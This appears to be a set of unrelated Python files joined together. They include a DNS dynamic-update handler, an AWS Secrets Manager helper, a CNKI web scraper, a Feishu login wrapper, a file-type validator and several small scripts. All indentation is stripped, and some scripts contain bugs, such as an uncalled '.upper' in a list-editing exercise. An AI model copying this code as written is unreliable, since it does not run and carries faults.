raise UpdateError('dropped', zname, zclass, None, True)
logger.debug(logger.DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_APPROVED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
def __make_response(self, rcode):
'''Transform the internal message to the update response.
According RFC2136 Section 3.8, the zone section will be cleared
as well as other sections. The response Rcode will be set to the
given value.
'''
self.__message.make_response()
self.__message.clear_section(SECTION_ZONE)
self.__message.set_rcode(rcode)
def __prereq_rrset_exists(self, rrset):
'''Check whether an rrset with the given name and type exists. Class,
TTL, and Rdata (if any) of the given RRset are ignored.
RFC2136 Section 2.4.1.
Returns True if the prerequisite is satisfied, False otherwise.
Note: the only thing used in the call to find() here is the
result status. The actual data is immediately dropped. As
a future optimization, we may want to add a find() option to
only return what the result code would be (and not read/copy
any actual data).
'''
result, _, _ = self.__diff.find(rrset.get_name(), rrset.get_type())
return result == ZoneFinder.SUCCESS
def __prereq_rrset_exists_value(self, rrset):
'''Check whether an rrset that matches name, type, and rdata(s) of the
given rrset exists.
RFC2136 Section 2.4.2
Returns True if the prerequisite is satisfied, False otherwise.
'''
result, found_rrset, _ = self.__diff.find(rrset.get_name(),
rrset.get_type())
if result == ZoneFinder.SUCCESS and\
rrset.get_name() == found_rrset.get_name() and\
rrset.get_type() == found_rrset.get_type():
# We need to match all actual RRs, unfortunately there is no
# direct order-independent comparison for rrsets, so this
# a slightly inefficient way to handle that.
# shallow copy of the rdata list, so we are sure that this
# loop does not mess with actual data.
found_rdata = copy.copy(found_rrset.get_rdata())
for rdata in rrset.get_rdata():
if rdata in found_rdata:
found_rdata.remove(rdata)
else:
return False
return len(found_rdata) == 0
return False
def __prereq_rrset_does_not_exist(self, rrset):
'''Check whether no rrsets with the same name and type as the given
rrset exist.
RFC2136 Section 2.4.3.
Returns True if the prerequisite is satisfied, False otherwise.
'''
return not self.__prereq_rrset_exists(rrset)
def __prereq_name_in_use(self, rrset):
'''Check whether the name of the given RRset is in use (i.e. has
1 or more RRs).
RFC2136 Section 2.4.4
Returns True if the prerequisite is satisfied, False otherwise.
Note: the only thing used in the call to find_all() here is
the result status. The actual data is immediately dropped. As
a future optimization, we may want to add a find_all() option
to only return what the result code would be (and not read/copy
any actual data).
'''
result, rrsets, flags = self.__diff.find_all(rrset.get_name())
if result == ZoneFinder.SUCCESS and\
(flags & ZoneFinder.RESULT_WILDCARD == 0):
return True
return False
def __prereq_name_not_in_use(self, rrset):
'''Check whether the name of the given RRset is not in use (i.e. does
not exist at all, or is an empty nonterminal.
RFC2136 Section 2.4.5.
Returns True if the prerequisite is satisfied, False otherwise.
'''
return not self.__prereq_name_in_use(rrset)
def __check_in_zone(self, rrset):
'''Returns true if the name of the given rrset is equal to
or a subdomain of the zname from the Zone Section.'''
relation = rrset.get_name().compare(self.__zname).get_relation()
return relation == NameComparisonResult.SUBDOMAIN or\
relation == NameComparisonResult.EQUAL
def __check_prerequisites(self):
'''Check the prerequisites section of the UPDATE Message.
RFC2136 Section 2.4.
Returns a dns Rcode signaling either no error (Rcode.NOERROR)
or that one of the prerequisites failed (any other Rcode).
'''
# Temporary array to store exact-match RRsets
exact_match_rrsets = []
for rrset in self.__message.get_section(SECTION_PREREQUISITE):
# First check if the name is in the zone
if not self.__check_in_zone(rrset):
logger.info(LIBDDNS_PREREQ_NOTZONE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.NOTZONE
# Algorithm taken from RFC2136 Section 3.2
if rrset.get_class() == RRClass.ANY:
if rrset.get_ttl().get_value() != 0 or\
rrset.get_rdata_count() != 0:
logger.info(LIBDDNS_PREREQ_FORMERR_ANY,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
elif rrset.get_type() == RRType.ANY:
if not self.__prereq_name_in_use(rrset):
rcode = Rcode.NXDOMAIN
logger.info(LIBDDNS_PREREQ_NAME_IN_USE_FAILED,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset), rcode)
return rcode
else:
if not self.__prereq_rrset_exists(rrset):
rcode = Rcode.NXRRSET
logger.info(LIBDDNS_PREREQ_RRSET_EXISTS_FAILED,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset), rcode)
return rcode
elif rrset.get_class() == RRClass.NONE:
if rrset.get_ttl().get_value() != 0 or\
rrset.get_rdata_count() != 0:
logger.info(LIBDDNS_PREREQ_FORMERR_NONE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
elif rrset.get_type() == RRType.ANY:
if not self.__prereq_name_not_in_use(rrset):
rcode = Rcode.YXDOMAIN
logger.info(LIBDDNS_PREREQ_NAME_NOT_IN_USE_FAILED,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset), rcode)
return rcode
else:
if not self.__prereq_rrset_does_not_exist(rrset):
rcode = Rcode.YXRRSET
logger.info(LIBDDNS_PREREQ_RRSET_DOES_NOT_EXIST_FAILED,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset), rcode)
return rcode
elif rrset.get_class() == self.__zclass:
if rrset.get_ttl().get_value() != 0:
logger.info(LIBDDNS_PREREQ_FORMERR,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
else:
collect_rrsets(exact_match_rrsets, rrset)
else:
logger.info(LIBDDNS_PREREQ_FORMERR_CLASS,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
for collected_rrset in exact_match_rrsets:
if not self.__prereq_rrset_exists_value(collected_rrset):
rcode = Rcode.NXRRSET
logger.info(LIBDDNS_PREREQ_RRSET_EXISTS_VAL_FAILED,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(collected_rrset), rcode)
return rcode
# All prerequisites are satisfied
return Rcode.NOERROR
def __set_soa_rrset(self, rrset):
'''Sets the given rrset to the member __added_soa (which
is used by __do_update for updating the SOA record'''
self.__added_soa = rrset
def __do_prescan(self):
'''Perform the prescan as defined in RFC2136 section 3.4.1.
This method has a side-effect; it sets self._new_soa if
it encounters the addition of a SOA record in the update
list (so serial can be checked by update later, etc.).
It puts the added SOA in self.__added_soa.
'''
for rrset in self.__message.get_section(SECTION_UPDATE):
if not self.__check_in_zone(rrset):
logger.info(LIBDDNS_UPDATE_NOTZONE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.NOTZONE
if rrset.get_class() == self.__zclass:
# In fact, all metatypes are in a specific range,
# so one check can test TKEY to ANY
# (some value check is needed anyway, since we do
# not have defined RRtypes for MAILA and MAILB)
if rrset.get_type().get_code() >= 249:
logger.info(LIBDDNS_UPDATE_ADD_BAD_TYPE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
if rrset.get_type() == RRType.SOA:
# In case there's multiple soa records in the update
# somehow, just take the last
for rr in foreach_rr(rrset):
self.__set_soa_rrset(rr)
elif rrset.get_class() == RRClass.ANY:
if rrset.get_ttl().get_value() != 0:
logger.info(LIBDDNS_UPDATE_DELETE_NONZERO_TTL,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
if rrset.get_rdata_count() > 0:
logger.info(LIBDDNS_UPDATE_DELETE_RRSET_NOT_EMPTY,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
if rrset.get_type().get_code() >= 249 and\
rrset.get_type().get_code() <= 254:
logger.info(LIBDDNS_UPDATE_DELETE_BAD_TYPE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
elif rrset.get_class() == RRClass.NONE:
if rrset.get_ttl().get_value() != 0:
logger.info(LIBDDNS_UPDATE_DELETE_RR_NONZERO_TTL,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
if rrset.get_type().get_code() >= 249:
logger.info(LIBDDNS_UPDATE_DELETE_RR_BAD_TYPE,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
else:
logger.info(LIBDDNS_UPDATE_BAD_CLASS,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
RRsetFormatter(rrset))
return Rcode.FORMERR
return Rcode.NOERROR
def __do_update_add_single_rr(self, rr, existing_rrset):
'''Helper for __do_update_add_rrs_to_rrset: only add the
rr if it is not present yet
(note that rr here should already be a single-rr rrset)
'''
if existing_rrset is None:
self.__diff.add_data(rr)
else:
rr_rdata = rr.get_rdata()[0]
if not rr_rdata in existing_rrset.get_rdata():
self.__diff.add_data(rr)
def __do_update_add_rrs_to_rrset(self, rrset):
'''Add the rrs from the given rrset to the internal diff.
There is handling for a number of special cases mentioned
in RFC2136;
- If the addition is a CNAME, but existing data at its
name is not, the addition is ignored, and vice versa.
- If it is a CNAME, and existing data is too, it is
replaced (existing data is deleted)
An additional restriction is that SOA data is ignored as
well (it is handled separately by the __do_update method).
Note that in the (near) future, this method may have
addition special-cases processing.
'''
# For a number of cases, we may need to remove data in the zone
# (note; SOA is handled separately by __do_update, so that one
# is explicitly ignored here)
if rrset.get_type() == RRType.SOA:
return
result, orig_rrset, _ = self.__diff.find(rrset.get_name(),
rrset.get_type())
if result == ZoneFinder.CNAME:
# Ignore non-cname rrs that try to update CNAME records
# (if rrset itself is a CNAME, the finder result would be
# SUCCESS, see next case)
return
elif result == ZoneFinder.SUCCESS:
# if update is cname, and zone rr is not, ignore
if rrset.get_type() == RRType.CNAME:
# Remove original CNAME record (the new one
# is added below)
self.__diff.delete_data(orig_rrset)
# We do not have WKS support at this time, but if there
# are special Update equality rules such as for WKS, and
# we do have support for the type, this is where the check
# (and potential delete) would go.
elif result == ZoneFinder.NXRRSET:
# There is data present, but not for this type.
# If this type is CNAME, ignore the update
if rrset.get_type() == RRType.CNAME:
return
for rr in foreach_rr(rrset):
self.__do_update_add_single_rr(rr, orig_rrset)
def __do_update_delete_rrset(self, rrset):
'''Deletes the rrset with the name and type of the given
rrset from the zone data (by putting all existing data
in the internal diff as delete statements).
Special cases: if the delete statement is for the
zone's apex, and the type is either SOA or NS, it
is ignored.'''
# find the rrset with local updates
result, to_delete, _ = self.__diff.find_updated(rrset.get_name(),
rrset.get_type())
if result == ZoneFinder.SUCCESS:
if to_delete.get_name() == self.__zname and\
(to_delete.get_type() == RRType.SOA or\
to_delete.get_type() == RRType.NS):
# ignore
return
for rr in foreach_rr(to_delete):
self.__diff.delete_data(rr)
def __ns_deleter_helper(self, rrset):
'''Special case helper for deleting NS resource records
at the zone apex. In that scenario, the last NS record
may never be removed (and any action that would do so
should be ignored).
'''
# Find the current NS rrset, including local additions and deletions
result, orig_rrset, _ = self.__diff.find_updated(rrset.get_name(),
rrset.get_type())
# Even a real rrset comparison wouldn't help here...
# The goal is to make sure that after deletion of the
# given rrset, at least 1 NS record is left (at the apex).
# So we make a (shallow) copy of the existing rrset,
# and for each rdata in the to_delete set, we check if it wouldn't
# delete the last one. If it would, that specific one is ignored.
# If it would not, the rdata is removed from the temporary list
orig_rrset_rdata = copy.copy(orig_rrset.get_rdata())
for rdata in rrset.get_rdata():
if len(orig_rrset_rdata) == 1 and rdata == orig_rrset_rdata[0]:
# ignore
continue
else:
# create an individual RRset for deletion
to_delete = bundy.dns.RRset(rrset.get_name(),
rrset.get_class(),
rrset.get_type(),
rrset.get_ttl())
to_delete.add_rdata(rdata)
orig_rrset_rdata.remove(rdata)
self.__diff.delete_data(to_delete)
def __do_update_delete_name(self, rrset):
'''Delete all data at the name of the given rrset,
by adding all data found by find_all as delete statements
to the internal diff.
Special case: if the name is the zone's apex, SOA and
NS records are kept.
'''
# Find everything with the name, including local additions
result, rrsets, flags = self.__diff.find_all_updated(rrset.get_name())
if result == ZoneFinder.SUCCESS and\
(flags & ZoneFinder.RESULT_WILDCARD == 0):
for to_delete in rrsets:
# if name == self.__zname and type is soa or ns, don't delete!
if to_delete.get_name() == self.__zname and\
(to_delete.get_type() == RRType.SOA or
to_delete.get_type() == RRType.NS):
continue
else:
for rr in foreach_rr(to_delete):
self.__diff.delete_data(rr)
def __do_update_delete_rrs_from_rrset(self, rrset):
'''Deletes all resource records in the given rrset from the
zone. Resource records that do not exist are ignored.
If the rrset if of type SOA, it is ignored.
Uses the __ns_deleter_helper if the rrset's name is the
zone's apex, and the type is NS.
'''
# Delete all rrs in the rrset, except if name=self.__zname and type=soa, or
# type = ns and there is only one left (...)
# The delete does not want class NONE, we would not have gotten here
# if it wasn't, but now is a good time to change it to the zclass.
to_delete = convert_rrset_class(rrset, self.__zclass)
if rrset.get_name() == self.__zname:
if rrset.get_type() == RRType.SOA:
# ignore
return
elif rrset.get_type() == RRType.NS:
# hmm. okay. annoying. There must be at least one left,
# delegate to helper method
self.__ns_deleter_helper(to_delete)
return
for rr in foreach_rr(to_delete):
self.__diff.delete_data(rr)
def __update_soa(self):
'''Checks the member value __added_soa, and depending on
whether it has been set and what its value is, creates
a new SOA if necessary.
Then removes the original SOA and adds the new one,
by adding the needed operations to the internal diff.'''
# Get the existing SOA
# if a new soa was specified, add that one, otherwise, do the
# serial magic and add the newly created one
# get it from DS and to increment and stuff
result, old_soa, _ = self.__diff.find(self.__zname, RRType.SOA,
ZoneFinder.NO_WILDCARD |
ZoneFinder.FIND_GLUE_OK)
# We may implement recovering from missing SOA data at some point, but
# for now servfail on such a broken state
if result != ZoneFinder.SUCCESS:
raise UpdateError("Error finding SOA record in datasource.",
self.__zname, self.__zclass, Rcode.SERVFAIL)
serial_operation = DDNS_SOA()
if self.__added_soa is not None and\
serial_operation.soa_update_check(old_soa, self.__added_soa):
new_soa = self.__added_soa
else:
# increment goes here
new_soa = serial_operation.update_soa(old_soa)
self.__diff.delete_data(old_soa)
self.__diff.add_data(new_soa)
def __validate_error(self, reason):
'''
Used as error callback below.
'''
logger.error(LIBDDNS_ZONE_INVALID_ERROR, self.__zname, self.__zclass,
reason)
def __validate_warning(self, reason):
'''
Used as warning callback below.
'''
logger.warn(LIBDDNS_ZONE_INVALID_WARN, self.__zname, self.__zclass,
reason)
def __do_update(self):
'''Scan, check, and execute the Update section in the
DDNS Update message.
Returns an Rcode to signal the result (NOERROR upon success,
any error result otherwise).
'''
# prescan
prescan_result = self.__do_prescan()
if prescan_result != Rcode.NOERROR:
return prescan_result
# update
try:
# Do special handling for SOA first
self.__update_soa()
# Algorithm from RFC2136 Section 3.4
# Note that this works on full rrsets, not individual RRs.
# Some checks might be easier with individual RRs, but only if we
# would use the ZoneUpdater directly (so we can query the
# 'zone-as-it-would-be-so-far'. However, due to the current use
# of the Diff class, this is not the case, and therefore it
# is easier to work with full rrsets for the most parts
# (less lookups needed; conversion to individual rrs is
# the same effort whether it is done here or in the several
# do_update statements)
for rrset in self.__message.get_section(SECTION_UPDATE):
if rrset.get_class() == self.__zclass:
self.__do_update_add_rrs_to_rrset(rrset)
elif rrset.get_class() == RRClass.ANY:
if rrset.get_type() == RRType.ANY:
self.__do_update_delete_name(rrset)
else:
self.__do_update_delete_rrset(rrset)
elif rrset.get_class() == RRClass.NONE:
self.__do_update_delete_rrs_from_rrset(rrset)
if not check_zone(self.__zname, self.__zclass,
self.__diff.get_rrset_collection(),
(self.__validate_error, self.__validate_warning)):
raise UpdateError('Validation of the new zone failed',
self.__zname, self.__zclass, Rcode.REFUSED)
self.__diff.commit()
return Rcode.NOERROR
except UpdateError:
# Propagate UpdateError exceptions (don't catch them in the
# blocks below)
raise
except bundy.datasrc.Error as dse:
logger.info(LIBDDNS_UPDATE_DATASRC_COMMIT_FAILED, dse)
return Rcode.SERVFAIL
except Exception as uce:
logger.error(LIBDDNS_UPDATE_UNCAUGHT_EXCEPTION,
ClientFormatter(self.__client_addr),
ZoneFormatter(self.__zname, self.__zclass),
uce)
return Rcode.SERVFAIL
|
my2dlist=[[2,5,8],[3,7,4],[1.6,9],[4,2,0]]
userrow=int(input('what row do you want displayed'))
print(*my2dlist[userrow])
usercolumn=int(input('which column in this row do you want displayed'))
print(my2dlist[userrow][usercolumn])
userchoice=input('do you want to chage that value').upper
# Github is working with my new laptop - another test
if userchoice=="Yes":
replacement=int(input('what do you want to replace it with'))
my2dlist[userrow][usercolumn]=replacement
print(my2dlist[userrow][usercolumn])
|
from openmoltools import forcefield_generators
from openeye import oechem
def normalize_molecule(mol):
# Assign aromaticity.
oechem.OEAssignAromaticFlags(mol, oechem.OEAroModelOpenEye)
# Add hydrogens.
oechem.OEAddExplicitHydrogens(mol)
# Check for any missing atom names, if found reassign all of them.
if any([atom.GetName() == '' for atom in mol.GetAtoms()]):
oechem.OETriposAtomNames(mol)
ofs = oechem.oemolostream('out.mol2')
ofs.SetFormat(oechem.OEFormat_MOL2H)
oechem.OEWriteMolecule(ofs, mol)
ofs.close()
return mol
def generate_forcefield(molecule_file, outfile):
ifs = oechem.oemolistream()
ifs.open(molecule_file)
# get the list of molecules
mol_list = [normalize_molecule(oechem.OEMol(mol)) for mol in ifs.GetOEMols()]
# TODO: HORRIBLE HACK ; WILL DIE AT > 999 RESIDUES!
for idx, mol in enumerate(mol_list):
mol.SetTitle("%03d" % idx)
ffxml = forcefield_generators.generateForceFieldFromMolecules(mol_list, normalize=False)
with open(outfile, 'w') as output_file:
output_file.write(ffxml)
if __name__=="__main__":
import sys
infile_name = sys.argv[1]
outfile_name = sys.argv[2]
generate_forcefield(infile_name, outfile_name)
|
import requests
from bs4 import BeautifulSoup
import socket
# 获取关键词为人工冻结的知网页面
def getHtml(url, cookie, origin):
headers = {}
headers.setdefault("Cookie", cookie)
# headers.setdefault("Origin", origin)
headers.setdefault("User-Agent",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36")
req = requests.get(url, timeout=40, headers=headers, stream=True)
req.raise_for_status()
req.encoding = req.apparent_encoding
return req.text
def getAbstract(links, cookie, url):
abstracts = []
attempts = 0
for link in links:
# 每一个link都是需要去访问的网页
success = False
while attempts < 50 and not success:
try:
resp = getHtml(link, cookie, url)
soup = BeautifulSoup(resp, 'html.parser')
abstract = soup.find('div', style='text-align:left;word-break:break-all').get_text()[6:]
abstract = abstract.replace('\r', '')
abstract = abstract.replace('\n', '')
abstract = abstract.replace(' ', '')
abstracts.append(abstract)
socket.setdefaulttimeout(10)
success = True
except:
attempts += 1
print("link第" + str(attempts) + "次重试!!")
success = False
if attempts == 50:
break
return abstracts
def getCiyun():
pass |
'''
Created on 11 set 2017
@author: davide
'''
'''
Loop example
'''
# Loop example
import tensorflow as tf
x = tf.Variable(0, name = 'x')
model = tf.global_variables_initializer()
print(model)
with tf.Session() as session:
session.run(model)
for i in range(5):
x = x + 1
print(session.run(x)) |
def vegalite_piechart(n_pass, n_fail):
pie = {
"$schema": "https://vega.github.io/schema/vega-lite/v4.json",
"description": "A simple pie chart showing the ratio of passed and failed tests.",
"data": {
"values": [
{"category": "pass", "value": n_pass},
{"category": "fail", "value": n_fail},
]
},
"mark": "arc",
"encoding": {
"theta": {"field": "value", "type": "quantitative"},
"color": {"field": "category", "type": "nominal"}
}
}
return pie |
import boto3
import base64
import os
import yaml
import json
from botocore.exceptions import ClientError
session = boto3.session.Session()
# Create a Secrets Manager client
client = session.client(
service_name='secretsmanager'
)
def __accountIds():
if os.path.isfile('config.yaml') is True:
with open('config.yaml') as f:
config = yaml.safe_load(f.read())
AccountIds = config['SharedAccounts']
return AccountIds
elif os.environ['SHARED_ACCOUNTIDS'] is None:
print('No config or environment variables present, exiting')
exit()
else:
AccountIds = os.environ['SHARED_ACCOUNTIDS']
return AccountIds
def __environmentTags():
if os.path.isfile('config.yaml') is True:
with open('config.yaml') as f:
config = yaml.safe_load(f.read())
configTags = config['Pipeline']
AccountIds = config['SharedAccounts']
tags = [configTags['Portfolio'], configTags['App'], configTags['Branch']]
return tags, AccountIds
elif os.environ['PIPELINE_PORTFOLIO'] is None:
print('No config or environment variables present, exiting')
exit()
else:
tags = [os.environ['PIPELINE_PORTFOLIO'], os.environ['PIPELINE_APP'], os.environ['PIPELINE_BRANCH_SHORT_NAME']]
return tags
def __errorHandler(e):
if e.response['Error']['Code'] == 'EncryptionFailureException':
print('Failed to encrypt or decrypt the secret, are you sure you have sufficent KMS privileges?')
raise e
elif e.response['Error']['Code'] == 'InternalServiceErrorException':
print('500 Error for the internal service - see raised error below')
raise e
elif e.response['Error']['Code'] == 'InvalidParameterException':
print('You have used a invalid paramater and thus, the service has thrown an exception - see raised error below')
raise e
elif e.response['Error']['Code'] == 'InvalidRequestException':
print('You have asked the service to do something and it does not understand the request, marking it invalid - see error raised below')
raise e
elif e.response['Error']['Code'] == 'ResourceNotFoundException':
print('You have asked the secret service for a secret that does not exist or that this role does not have permission to access')
raise e
def __sharedSecretPolicy(name, accounts=[]):
accountArns = []
for account in accounts:
accountArns.append("arn:aws:iam::{id}:root".format(id=account))
resourcePolicyJson = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {"AWS": accountArns},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*",
"Condition": {"ForAnyValue:StringEquals": {"secretsmanager:VersionStage": "AWSCURRENT"}}
}
]
}
response = client.put_resource_policy(
SecretId=name,
ResourcePolicy=resourcePolicyJson
)
return response['ARN']
def __generatePassword():
response = client.get_random_password(
PasswordLength=64,
ExcludeCharacters='|iIlL<:`\'"',
ExcludeNumbers=False,
ExcludePunctuation=False,
ExcludeUppercase=False,
ExcludeLowercase=False,
IncludeSpace=False,
RequireEachIncludedType=False
)
return response['RandomPassword']
def __checkSecret(Name):
try:
describe_secret = client.describe_secret(
SecretId=Name
)
except ClientError as e:
__errorHandler(e)
else:
print(describe_secret['Name'])
return True
def update(Name, Value=None, Description='', kmsKeyId=''):
if Value is None:
Value = __generatePassword()
try:
update_secret_response = client.update_secret(
SecretId=Name,
SecretString=Value,
Description=Description,
KmsKeyId=kmsKeyId
)
except ClientError as e:
__errorHandler(e)
else:
secret = update_secret_response['Name']
return secret
else:
try:
update_secret_response = client.update_secret(
SecretId=Name,
SecretString=Value,
KmsKeyId=kmsKeyId
)
except ClientError as e:
__errorHandler(e)
else:
secret = update_secret_response['Name']
def get(Name):
try:
get_secret_value_response = client.get_secret_value(
SecretId=Name
)
except ClientError as e:
__errorHandler(e)
return False
else:
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
print(secret)
return secret
else:
decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])
print(decoded_binary_secret)
return decoded_binary_secret
def put(Name, Description='', Value='', kmsKeyId='', shared=False):
try:
tags = __environmentTags()
secretName = "{Portfolio}_{App}_{Branch}_{Name}".format(Portfolio=tags[0],
App=tags[1],
Branch=tags[2],
Name=Name)
put_secret_value_response = client.create_secret(
Name=secretName,
Description=Description,
KmsKeyId=kmsKeyId,
SecretString=Value,
Tags=[
{
'Key': 'Portfolio',
'Value': tags[0]
},
{
'Key': 'App',
'Value': tags[1]
},
{
'Key': 'Branch',
'Value': tags[2]
}
]
)
except ClientError as e:
__errorHandler(e)
else:
secret = put_secret_value_response['Name']
if shared is True:
__sharedSecretPolicy(name=secret, accounts=__accountIds())
return secret
def delete(Name):
try:
delete_secret_response = client.delete_secret(
SecretId=Name,
RecoveryWindowInDays=120,
ForceDeleteWithoutRecovery=False
)
except ClientError as e:
__errorHandler(e)
else:
secret = delete_secret_response['SecretId']
return secret
|
# -*- coding: utf-8 -*-
from .app_access_token import AppAccessToken, final_app_access_token
class Authen(AppAccessToken):
def __init__(self, appid=None, secret=None, ticket=None, tenant_key=None, token=None, storage=None):
super(Authen, self).__init__(appid=appid, secret=secret, ticket=ticket, tenant_key=tenant_key, token=token, storage=storage)
# 获取登录用户身份, Refer: https://open.feishu.cn/document/ukTMukTMukTM/uEDO4UjLxgDO14SM4gTN
self.AUTHEN_V1_ACCESS_TOKEN = self.OPEN_DOMAIN + '/open-apis/authen/v1/access_token'
def get_userinfo(self, code=None, grant_type='authorization_code', appid=None, secret=None, ticket=None, token=None, storage=None):
# Update params
self.update_params(appid=appid, secret=secret, ticket=ticket, storage=storage)
# Token
token = final_app_access_token(self, appid=appid, secret=secret, ticket=ticket, token=token, storage=storage)
return self.post(self.AUTHEN_V1_ACCESS_TOKEN, data={
'app_access_token': token,
'grant_type': grant_type,
'code': code,
}).get('data', {})
authen = Authen()
get_userinfo = authen.get_userinfo
authen_get_userinfo = authen.get_userinfo
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 8 19:45:15 2021
@author: dankovacevich
"""
from zipfile import ZipFile
import re
import py_compile
import os
import sys
import PyPDF2
import imghdr
import subprocess
#-----------list of condition names-----------
pythonFile = f".*(.py)$"
pdfFile = f"(.pdf)$"
pngFile = f"(.png)$"
def UnixFileType(filename):
return subprocess.check_output(["file","--mime-type", "-b", filename]).decode().rstrip()
#----------Test For Readable Text File------------
def ReadableTextFile():
def readabletext(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "text/plain"):
return 'correct'
else:
return "Not a valid .txt file"
except:
return "Not a valid .txt file"
return readabletext
ReadableTextFile = ReadableTextFile()
#----------Test For Readable PDF File------------
def ReadablePDFFile():
def readablepdf(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "application/pdf"):
return 'correct'
else:
return "Not a valid .pdf file"
except:
return "Not a valid .pdf file"
return readablepdf
ReadablePDFFile = ReadablePDFFile()
#----------Test For Readable JPEG File------------
def ReadableJPEGFile():
def readablejpg(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "image/jpeg"):
return 'correct'
else:
return "Not a valid JPEG file"
except:
return "Not a valid JPEG file"
return readablejpg
ReadableJPEGFile = ReadableJPEGFile()
#----------Test For Readable PNG File------------
def ReadablePNGFile():
def readablepng(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "image/png"):
return 'correct'
else:
return "Not a valid png file"
except:
return "Not a valid png file"
return 'correct'
return readablepng
ReadablePNGFile = ReadablePNGFile()
#----------Test For Readable MSWORD File------------
def ReadableMSWORDFile():
def readableword(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "application/msword" or
filetype == "application/vnd.openxmlformats-officedocument.wordprocessingml.document"):
return 'correct'
else:
return "Not a valid MS word document"
except:
return "Not a valid MS word document"
return readableword
ReadableMSWORDFile = ReadableMSWORDFile()
#----------Test For Readable EXCEL File------------
def ReadableEXCELFile():
def readableexcel(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "application/vnd.ms-excel" or
filetype == "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"):
return 'correct'
else:
return "Not a valid MS Excel file"
except:
return "Not a valid MS Excel file"
return readableexcel
ReadableEXCELFile = ReadableEXCELFile()
#----------Test For Readable PPT File------------
def ReadablePPTFile():
def readableppt(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "application/vnd.ms-powerpoint" or
filetype == "application/vnd.openxmlformats-officedocument.presentationml.presentation"):
return 'correct'
else:
return "Not a valid MS PPT file"
except:
return "Not a valid MS PPT file"
return readableppt
ReadablePPTFile = ReadablePPTFile()
#----------Test For Readable HTML File------------
def ReadableHTMLFile():
def readablehtml(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "text/html"):
return 'correct'
else:
return "Not a valid html file"
except:
return "Not a valid html file"
return readablehtml
ReadableHTMLFile = ReadableHTMLFile()
#----------Test For Readable CSS File------------
def ReadableCSSFile():
def readablecss(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "text/css"):
return 'correct'
else:
return "Not a valid css file"
except:
return "Not a valid css file"
return readablecss
ReadableCSSFile = ReadableCSSFile()
#----------Test For Readable CSV File------------
def ReadableCSVFile():
def readablecsv(filename):
try:
filetype = UnixFileType(filename)
if(filetype == "text/csv"):
return 'correct'
else:
return "Not a valid csv file"
except:
return "Not a valid csv file"
return readablecsv
ReadableCSVFile = ReadableCSVFile()
#--------------Test for Max Pages-----------------
def PDFMaxPages(num):
def pdfpages(filename):
try:
reader = PyPDF2.PdfFileReader(filename)
if(reader.getNumPages() > num):
difference = reader.getNumPages() - num
dif = str(difference)
number = str(num)
return 'Over Max (' + number + ') Pages By ' + dif
else:
return 'correct'
except:
return 'Failed to Open File'
return pdfpages
#---------------Test For Compilation------------------
def PythonThatCompiles():
def pythontest(filename):
try:
py_compile.compile(filename, doraise=True)
except:
return 'Failed Compile Check'
return 'correct'
return pythontest
PythonThatCompiles = PythonThatCompiles()
#-------------Checks Specific Condition-----------
def checkcondition(zipfile,filename,requirement):
with ZipFile(zipfile, 'r') as my_zip:
my_zip.extract(filename)
return requirement(filename)
|
# coding: utf8
"""
File to run real data experiments.
"""
import json
import os
import sys
import time
import numpy as np
import sklearn
from sklearn.metrics import mean_squared_error
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.model_selection import GridSearchCV as GSCV
from sklearn.model_selection import KFold, ShuffleSplit
from utils import load_data_set, load_estimator
# Relative path leading to the repositories "github.com/soply/db_hand",
